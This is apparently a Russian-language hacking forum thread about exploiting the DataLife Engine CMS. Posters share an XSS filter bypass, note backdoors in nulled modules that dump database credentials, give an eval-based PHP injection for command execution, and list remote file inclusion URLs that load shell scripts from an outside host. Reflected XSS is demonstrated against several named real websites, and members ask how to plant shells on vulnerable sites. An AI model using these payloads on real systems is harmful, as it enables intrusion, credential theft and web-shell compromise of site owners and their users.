xss xss, проверял на 8.5 и 8.2 file /engine/modules/imagepreview.php PHP: $_GET['image'] = @htmlspecialchars ($_GET['image'], ENT_QUOTES); if( preg_match( "/[?&;%<\[\]]/", $_GET['image'] ) ) $_GET['image'] = ""; $_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] ); $_GET['image'] = str_replace( "javascript", "", $_GET['image'] ); http://dle85.ru/engine/modules/imagepreview.php?image=javajavascriptscript:alert(String.fromCharCode(120,115,115))
Дядя ZloY как всегда постарался(как понел это типо бекдоры в нуллах и модулях от злово и его "мега команды")... 1) require_once ENGINE_DIR.'/data/dbconfig.php'; echo "<b>dbconfig.php</b> : Host = ".DBHOST." DBName = ".DBNAME." DBUser = ".DBUSER." DBPassword: ".DBPASS."<br><br>"; 2) require_once ENGINE_DIR.'/api/api.class.php'; $user = md5(rand(0,10000)); $password = md5(rand(0,1000)); $res = $dle_api->external_register($user,$password,md5(rand(0,100000))."@mail .ru",1); echo $res; echo $user; echo "<br>"; echo $password; З.Ы. Кто знает как юзать плиз в личку кинь... Ах да, было найдено http://getdle.com/extras/referer/xss/1.txt и http://getdle.com/extras/referer/xss/2.txt
А чо там юзать - просто при заходе на ./engine/data/dbconfig.php выводится логин, пасс и хост базы данных. А второе регистрирует нового юзверя и выводит пароль и логин.
Что то давно о ДЛЕ не чего не слышно уже как бы и 9.0 вышло ... И офф. сайт чето мудрит http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html
http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html )), пофиксели мой приватный способ заливки шелла
Там два момента. На мой взгялд они не связаны (с поиском и средактором шаблона). Редактор доступен только из админки, и вот что мне удалось натестить: Если отправить POST запрос приблизительного следующего содержания: HTML: <form method="post" action="/admin.php?mod=templates"> <input type=hidden name=user_hash value="ХЕШ_ЮЗЕРА"> <input type="hidden" name="subaction" value="language"> кнопка сабмит где то тут... <input type="hidden" name="do_template" value='строки_записываемые_в_config.php> <input type="hidden" name="do_language" value='строки_записываемые_в_config.php'> </form> Поигратся с кавычками, то можно затолкать туда php код для исполнения... С поиском так и не понял, что можно намутить __________________________________ К моему предедёщему посту дополнение. В POST запросе нужно отправить: Code: {${@eval($_GET[cmd])}} после этого любая комманды вида: site.ru/?cmd=echo%20phpinfo(); ЗЫ комманда д.б. закодирована urlencode(); ___________________________________ не стоим на месте: "глобальные массивы" д.б. ОN, а дальше: ?do=search&subaction=search&story=bla-bla&sql_count=Sql_Que..&titleonly=FOUR
Кто скажет что про это, http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html какой то баг видно серьезный нашли
oko, а в посте перед тобой о чем расписано ? slva2000, получается воспользоваться багом с редактором шаблона можно только через админку ? И можешь чуть поподробней расписать, как использовать баг с поиском?
Раскрытие префикса к БД версии, вероятно, до 8.0 1. Регаешься 2. Авторизируешься 3. Смотриш куку с именем, вида XXXX_name, которая принимает значение твоего логина, где XXXX - префикс к БД.
Это не префикс к БД, это просто название куки, она всегда dle_name, есть еще dle_password, dle_pm и dle_user_id. Проверено на dle7.0, dle7.3 и dle 7.5
Выкладываю несколько сплоитов для DLE 8.3 ttp://skripters.com/engine/inc/include/init.php?selected_language=http://loca lhost/c.txt? http://skripters.com/engine/inc/help.php?config[langs]=http://localhost/c.txt ? http://skripters.com/engine/ajax/pm.php?config[lang_=[EV!L] http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local host/c.txt? http://skripters.com/engine/ajax/addcomments.php?_REQUEST[skin]]=http://local host/c.txt?
Чет не врубился как юзать, подробнее можете расписать? Я так понимаю заливаем шелл. Залил я шелл допустим на народ, нашел парочку сайтов на дле данной версии и пробую... на некоторых просто белая страница, на других вылазиет какая то ошибка.
ребят, у кого осталась уязвимая версия lostpassword.php для 8,2 или кто может сделать такую же темку для 8,3?) надо прикрутить на сайт)
Пиар лицензии или как ? Слышал подвержены все => 9.0. Кто знает как юзать дырку прошу пример в студию
Это вообще что-за баг? На официальном сайте нет про это, а в гугле описание бага нашел только на сайте, где он уже удален.
Ты думаешь на офф сайте будут публиковать такую багу ? -> ппц ржунимагу... Дырку врядли в открытую опубликуют ибо 25% рунета уйдёт ф попу ибо юзают нулл от DLE... И врядли дыра вообще существует. Хотя надо проверить
xss Фотоальбомы для DataLife Engine версия: 0.09 точно остальные не проверял тип: XSS site.ru/engine/photo/image.php?&filetype=gif&type=XSS примеры Code: http://dle-photo.admin-club.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E http://www.turbooks.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E http://www.mysoft-bel.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E http://korshuniha.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E http://dams.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E http://nugon.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
